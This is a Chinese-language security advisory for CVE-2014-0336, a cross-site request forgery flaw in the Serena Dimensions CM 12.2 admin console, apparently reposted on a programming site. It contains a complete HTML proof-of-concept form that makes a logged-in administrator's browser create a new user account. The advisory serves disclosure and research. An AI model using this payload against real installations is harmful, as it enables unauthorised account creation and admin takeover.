发布日期:2014-03-05
更新日期:2014-03-11受影响系统:
SERENA Software Inc Serena Dimensions CM
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 65981
CVE(CAN) ID: CVE-2014-0336Serena Dimensions CM是基于进程的软件更改和配置管理解决方案。Serena Dimensions CM 12.2 Build 7.199.0及其他版本的Web客户端存在跨站请求伪造漏洞,这可使远程攻击者通过adminconsole/ URI的 user_new_master 参数,利用该漏洞劫持管理员身份验证请求,获取管理员权限。<*来源:Ken Cijsouw
链接:http://www.kb.cert.org/vuls/id/823452
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!Proof-of-Concept:
<html><!-- CSRF PoC --><body><form
action="http://testhost:8080/adminconsole/?jsp=user_new_master&target=merant.adm.dimensions.objects.
User&create=yes" method="POST">
<input type="hidden" name="-AdmAttrNames.user_dept" value="" />
<input type="hidden" name="-AdmAttrNames.id" value="HACKTEST1" />
<input type="hidden" name="USER_CURWORKSET" value="%24GENERIC%3a%24GLOBAL" /><input type="hidden" name="iSUSErEdit" value="false" />
<input type="hidden" name="-AdmAttrNames.user_site" value="" />
<input type="hidden" name="-AdmAttrNames.user_phone" value="" />
<input type="hidden" name="AUTOMATIC_LOGIN" value="" />
<input type="hidden" name="-AdmAttrNames.user_group_id" value="" />
<input type="hidden" name="null" value="" />
<input type="hidden" name="DIALOG_MODE" value="MODE%5fCREATE" />
<input type="hidden" name="-AdmAttrNames.user_full_name" value="HACKTEST1" /><input type="hidden" name="projectPicker" value="%24GENERIC%3a%24GLOBAL" />
<input type="hidden" name="wait_until_loaded" value="" />
<input type="hidden" name="projectPickerUid" value="1" />
<input type="hidden" name="GROUPS_ASSIGNED" value="" />
<input type="hidden" name="-AdmAttrNames.email"
value="ken1%2ecijsouw%40sincerus%2enl" /><input type="submit" value="Submit request" />
</form>
</body>建议:
--------------------------------------------------------------------------------
厂商补丁:SERENA Software Inc
-------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.serena.com/index.php/en/products/featured-products/dimensions-cm/参考:http://cwe.mitre.org/data/definitions/79.html
http://cwe.mitre.org/data/definitions/352.html
http://www.serena.com/index.php/en/products/featured-products/dimensions-cm/SpagoBI 持续性跨站脚本攻击漏洞Citrix NetScaler应用交付控制器本地信息泄露漏洞(CVE-2013-6940)相关资讯 Serena Dimensions CM 本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或
|
易网时代-编程资源站